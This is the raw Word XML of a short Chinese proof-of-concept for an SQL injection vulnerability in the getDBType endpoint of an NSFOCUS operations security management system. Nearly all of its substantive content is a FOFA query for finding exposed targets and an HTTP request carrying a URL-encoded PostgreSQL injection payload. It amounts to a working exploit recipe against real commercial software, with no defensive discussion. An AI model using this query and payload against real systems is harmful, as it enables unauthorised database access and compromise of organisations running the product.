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80D9C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绿盟运维安全管理系统 getDBType SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514695AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD1B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FOFA：body="'/needUsbkey.php?username='"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AD67B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB7ED5A"/>
    <w:p w14:paraId="65777E03"/>
    <w:p w14:paraId="04438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54A5BBD5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="115BD96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/webconf/log/getDBType?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cat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espc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7473a85e535405e7bd991cb82b2f134c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sql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(SELECT+(CHR(113)%7C%7CCHR(122)%7C%7CCHR(122)%7C%7CCHR(107)%7C%7CCHR(113))%7C%7C(SELECT+(CASE+WHEN+(3788%3D3788)+THEN+1+ELSE+0+END))%3A%3Atext%7C%7C(CHR(113)%7C%7CCHR(112)%7C%7CCHR(112)%7C%7CCHR(113)%7C%7CCHR(113)))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4B24DF5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04C620D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text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD15A0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4FDF0D7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en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C32E12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3AF4CCE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Chrome/91.0.4472.124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680E52A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F7AD0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72246A"/>
    <w:rsid w:val="5E04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693</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>715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2025-11-03T06:46:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:15:52Z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BABC9115119446438BC8E706A77BEE1D_12</vt:lpwstr>
  </property>
</Properties>
</file>